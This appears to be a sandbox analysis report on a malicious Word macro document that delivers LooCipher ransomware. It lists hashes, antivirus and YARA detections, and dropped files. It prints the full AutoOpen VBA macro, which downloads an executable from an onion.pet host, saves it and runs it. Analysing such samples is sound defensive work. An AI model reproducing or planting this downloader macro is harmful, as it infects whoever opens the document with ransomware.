VTI SCORE: 100/100
Dynamic Analysis Report |
Classification: Downloader |
Info_Project_BSV_2019.docm
Word Document
Created at 2019-06-18T08:41:00
This is a filtered view
This list contains only the embedded files, downloaded files, and dropped files
Filters: |
There are no files for this filter
There are no files in this analysis
Filename | Category | Type | Severity | Actions |
---|
C:\Users\aETAdzjz\Desktop\Info_Project_BSV_2019.docm | Sample File | Word Document |
Malicious
|
...
|
»
Office Information
»
Revision | 1 |
Create Time | 2019-06-17 07:54:00+00:00 |
Modify Time | 2019-06-17 07:54:00+00:00 |
Document Information
»
Application | Microsoft Office Word |
App Version | 16.0000 |
Template | Normal |
Document Security | SecurityFlag.NONE |
Page Count | 1 |
Line Count | 1 |
Paragraph Count | 1 |
Word Count | 5 |
Character Count | 31 |
Chars With Spaces | 35 |
Heading Pairs | Título |
ScaleCrop |
![]() |
SharedDoc |
![]() |
Controls (1)
»
CLSID | Control Name | Associated Vulnerability |
---|---|---|
{0003000C-0000-0000-C000-000000000046} | Package | EmbeddedFile |
VBA Macros (1)
»
Macro #1: ThisDocument
»
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "http://hcwyo5rfapkytajg.onion.pet/2hq68vxr3f.exe", False
xHttp.Send
With bStrm
.Type = 1 '//binary
.Open
.write xHttp.responseBody
.savetofile "LooCipher.exe", 2 '//overwrite
End With
Shell ("LooCipher.exe")
End Sub
Local AV Matches (1)
»
Threat Name | Severity |
---|---|
VB:Trojan.Emeka.556 |
Malicious
|
YARA Matches (1)
»
Rule Name | Rule Description | Classification | Severity | Actions |
---|---|---|---|---|
VBA_Download_Commands | VBA macro may attempt to download external content; possible dropper | - |
Suspicious
|
...
|
VBA_Execution_Commands | VBA macro may execute files or system commands | - |
Suspicious
|
...
|
43cfb0a439705ab2bd7c46b39a7265ff0a14f7bd710b3e1432a9bdc4c1736c49 | Downloaded File | Binary |
Malicious
|
...
|
»
Local AV Matches (1)
»
Threat Name | Severity |
---|---|
Gen:Heur.Ransom.Imps.3 |
Malicious
|
9e85d5b14d6d482eaa03c358dd0a88cf1fb215f26a872ad11623e7e56042486d | Embedded File | Unknown |
Malicious
|
...
|
»
Local AV Matches (1)
»
Threat Name | Severity |
---|---|
VB:Trojan.Emeka.556 |
Malicious
|
3b9f80d501595c4f910f60925f6db78dc0997ce5c25299e4f18ea7f5b9573616 | Embedded File | Text |
Whitelisted
|
...
|
»
File Reputation Information
»
Severity |
Whitelisted
|
First Seen | 2014-03-11 01:53 (UTC+1) |
Last Seen | 2018-04-29 07:41 (UTC+2) |
c97833e6456aa2bfe9be614f9c3ae41a8ef764b1cc3af92c6a6f273c62309122 | Embedded File | Text |
Whitelisted
|
...
|
»
File Reputation Information
»
Severity |
Whitelisted
|
First Seen | 2012-11-16 07:03 (UTC+1) |
Last Seen | 2019-06-11 12:54 (UTC+2) |
C:\ProgramData\Adobe\ARM\Reader_10.0.0\AdobeARM.bin.lcphr | Dropped File | Stream |
Unknown
|
...
|
»
0a50c25bbd1134733079dd0ab22bff0f2e5f1082e0b76ed740669deec6c3211f | Embedded File | Text |
Unknown
|
...
|
»
0b22134e7a1751128697fb648f51ef632f4f8b8a68fcf18d5f8713893f8bc25e | Embedded File | Text |
Unknown
|
...
|
»
5102245399f5af62a0bf031d9fc382841a258de75c978c87e62871c8fc733a96 | Embedded File | Text |
Unknown
|
...
|
»
761f2031d899d0378790355da98adc78bfffdcf6bd9f12a0f58979389b7a4e75 | Embedded File | Text |
Unknown
|
...
|
»
a75a028b132b1186680e401114909782fce3d349134e817081ad4e324bd1b68b | Embedded File | Text |
Unknown
|
...
|
»
bffc0c689379c0240d22d4c0dc9955752a6094928569803d1462e1fa06325d38 | Embedded File | Text |
Unknown
|
...
|
»